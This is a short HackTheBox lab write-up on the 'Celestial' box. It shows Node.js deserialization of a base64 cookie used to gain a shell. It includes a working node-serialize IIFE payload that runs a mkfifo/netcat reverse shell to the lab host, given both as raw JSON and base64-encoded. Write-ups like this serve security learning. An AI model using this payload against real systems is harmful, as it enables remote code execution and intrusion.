📃
Writeups
Blog
  • â„šī¸whoami
  • 👩‍đŸ’ģBinary Exploitation
    • Basic Binary Protections
    • ROP
    • Format String Bug
    • Stack Pivoting
    • Partial Overwrite
    • Symbolic Execution
    • Heap
      • Heap Basics
      • Heap Overflow
      • Heap Grooming
      • Use After Free / Double Free
      • Fast Bin Attack
      • One By Off Overwrite
      • House of Force
  • 🎮HackTheBox
    • Challenges
      • Baby Website Rick
      • Space pirate: Entrypoint
    • Boxes
      • Analysis
      • DevOops
      • Celestial
      • Rebound
      • CozyHosting
      • Authority
  • 📄CTF Writeups
    • CTF Writeups
      • USCTF 2024
        • Spooky Query Leaks
      • HackTheVote
        • Comma-Club (Revenge)
      • HeroCTF 2024
        • Heappie
      • Buckeye 2024
        • No-Handouts
      • TetCTF 2024
        • TET & 4N6
      • PatriotCTF 2023
        • ML Pyjail
        • Breakfast Club
    • Authored Challenges
      • Team Rocket
Powered by GitBook
On this page
  1. HackTheBox
  2. Boxes

Celestial

Short Snippet on Node JS deserialization

PreviousDevOopsNextRebound

Last updated 8 months ago

We are presented with a node.js application that upon refresh returns dynamic content.

Upon decoding the base64 cookie, we see that it is node JS. serialization

{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"3"}

The username field looks injectable, lets try to put our reverse shell payload in it.

{"username":"_$$ND_FUNC$$_function() {require('child_process').exec('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.2 1234>/tmp/f', (error, stdout, stderr) => { console.log(stdout); }); } ()"}
//encoded base64 version
eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbigpIHtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncm0gLWYgL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTAuMTYuMiAxMjM0Pi90bXAvZicsIChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpID0+IHsgY29uc29sZS5sb2coc3Rkb3V0KTsgfSk7IH0gKCkifQ==

The $$NDFUNC$$ indicates the presence of embedded javascript and executes the rest of the following line (our reverse shell_) immediately because of the IIFE brackets added at the end which will invoke the function when the object is created.

With that, we get our shell.

🎮